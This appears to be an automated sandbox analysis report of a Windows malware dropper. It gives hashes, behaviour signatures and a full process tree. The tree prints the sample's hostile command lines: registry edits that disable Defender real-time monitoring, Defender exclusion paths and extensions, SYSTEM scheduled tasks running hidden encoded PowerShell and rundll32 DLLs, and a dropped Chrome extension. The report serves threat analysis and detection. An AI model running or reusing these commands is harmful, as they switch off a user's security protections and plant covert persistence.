Analysis
-
max time kernel
235s -
max time network
236s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
-
submitted
01-07-2024 05:06
General
-
Target
a931321cee3ec87fa67636c1bec5907efbeb18c5e013b9cbe170e5b5c5dfc7d0.exe
-
Size
7.2MB
-
MD5
decb7189d9089b7d45706c427a5ee4a8
-
SHA1
050a6748764d8ba6ccebe944721422885a31caf6
-
SHA256
a931321cee3ec87fa67636c1bec5907efbeb18c5e013b9cbe170e5b5c5dfc7d0
-
SHA512
cc280c7d2d0904ccfba8317a7592cbc6399b4d4cb303114fa5df9d1c3e9e6310ec0acfbd15e53dbd6249b93d0bc7171ff158b5d8655463dadcc1815192f65afe
-
SSDEEP
196608:91OV3xCL8rggS1o6XvRSBQfYkIMMfXMfQqJzF19DjAp:3OZa931ofHkIM2MIqF+p
Score
10/10
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
-
Windows security bypass 2 TTPs 40 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 4 IoCs
-
Loads dropped DLL 23 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
-
Drops file in System32 directory 24 IoCs
-
Drops file in Program Files directory 13 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 30 IoCs
-
Suspicious use of AdjustPrivilegeToken 63 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\a931321cee3ec87fa67636c1bec5907efbeb18c5e013b9cbe170e5b5c5dfc7d0.exe"C:\Users\Admin\AppData\Local\Temp\a931321cee3ec87fa67636c1bec5907efbeb18c5e013b9cbe170e5b5c5dfc7d0.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS1786.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS196A.tmp\Install.exe.\Install.exe /pzoVrdidkhQz "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bUVDAOPnPkUhchiViu" /SC once /ST 05:08:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\VEEcyYEQYAyIstnON\QIyULnqRsjUxkcq\sfKiDDY.exe\" q7 /SpNdidCm 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2132 -s 5124⤵
- Loads dropped DLL
- Program crash
-
C:\Windows\system32\taskeng.exetaskeng.exe {7E53FB74-2F0E-4076-9A3C-12A16EFF1B3F} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\VEEcyYEQYAyIstnON\QIyULnqRsjUxkcq\sfKiDDY.exeC:\Users\Admin\AppData\Local\Temp\VEEcyYEQYAyIstnON\QIyULnqRsjUxkcq\sfKiDDY.exe q7 /SpNdidCm 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "geGODPbRO" /SC once /ST 00:59:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "geGODPbRO"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "geGODPbRO"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gexOPUYzj" /SC once /ST 01:04:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gexOPUYzj"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gexOPUYzj"3⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WZpWNMsDzSAcKsSA" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WZpWNMsDzSAcKsSA" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WZpWNMsDzSAcKsSA" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WZpWNMsDzSAcKsSA" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WZpWNMsDzSAcKsSA" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WZpWNMsDzSAcKsSA" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WZpWNMsDzSAcKsSA" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WZpWNMsDzSAcKsSA" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\WZpWNMsDzSAcKsSA\KWnDXiBt\LvfbgIXdSRSlFCkX.wsf"3⤵
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\WZpWNMsDzSAcKsSA\KWnDXiBt\LvfbgIXdSRSlFCkX.wsf"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MIUMVdEgyTUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MIUMVdEgyTUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NNMAoTKMcAkAC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NNMAoTKMcAkAC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bBBSFQQZU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bBBSFQQZU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rPikKiIbwrQGukIChiR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rPikKiIbwrQGukIChiR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rUfZlqUIdWiU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rUfZlqUIdWiU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fHdtCMTPryqSDgVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fHdtCMTPryqSDgVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\VEEcyYEQYAyIstnON" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\VEEcyYEQYAyIstnON" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WZpWNMsDzSAcKsSA" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WZpWNMsDzSAcKsSA" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MIUMVdEgyTUn" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MIUMVdEgyTUn" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NNMAoTKMcAkAC" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NNMAoTKMcAkAC" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bBBSFQQZU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bBBSFQQZU" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rPikKiIbwrQGukIChiR" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rPikKiIbwrQGukIChiR" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rUfZlqUIdWiU2" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rUfZlqUIdWiU2" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fHdtCMTPryqSDgVB" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fHdtCMTPryqSDgVB" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\VEEcyYEQYAyIstnON" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\VEEcyYEQYAyIstnON" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WZpWNMsDzSAcKsSA" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WZpWNMsDzSAcKsSA" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gYVTGnhou" /SC once /ST 01:48:46 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gYVTGnhou"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gYVTGnhou"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MhsnVFKWmmyXGZkTD" /SC once /ST 04:35:27 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WZpWNMsDzSAcKsSA\JdHzeCSmzFzWXve\nDgzJqR.exe\" DG /TmBfdidrT 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "MhsnVFKWmmyXGZkTD"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1728 -s 4843⤵
- Loads dropped DLL
- Program crash
-
C:\Windows\Temp\WZpWNMsDzSAcKsSA\JdHzeCSmzFzWXve\nDgzJqR.exeC:\Windows\Temp\WZpWNMsDzSAcKsSA\JdHzeCSmzFzWXve\nDgzJqR.exe DG /TmBfdidrT 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bUVDAOPnPkUhchiViu"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\bBBSFQQZU\PZptOj.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "LVynAQLCTpGcVPg" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LVynAQLCTpGcVPg2" /F /xml "C:\Program Files (x86)\bBBSFQQZU\SJvSgHN.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "LVynAQLCTpGcVPg"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "LVynAQLCTpGcVPg"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KatXkYONgJxXkD" /F /xml "C:\Program Files (x86)\rUfZlqUIdWiU2\BvMjMeI.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PuJMQwokvjmjr2" /F /xml "C:\ProgramData\fHdtCMTPryqSDgVB\KfWhvWN.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jmhuFmncXBbhpBxSq2" /F /xml "C:\Program Files (x86)\rPikKiIbwrQGukIChiR\KXrnhDm.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OztlfTauKwYVOQQXHnj2" /F /xml "C:\Program Files (x86)\NNMAoTKMcAkAC\reBcspO.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MRaTohzfdszDuijXP" /SC once /ST 04:26:07 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\WZpWNMsDzSAcKsSA\hJvnqnXE\ZZjgoob.dll\",#1 /KdidaF 525403" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "MRaTohzfdszDuijXP"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "MhsnVFKWmmyXGZkTD"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1412 -s 15483⤵
- Loads dropped DLL
- Program crash
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WZpWNMsDzSAcKsSA\hJvnqnXE\ZZjgoob.dll",#1 /KdidaF 5254032⤵
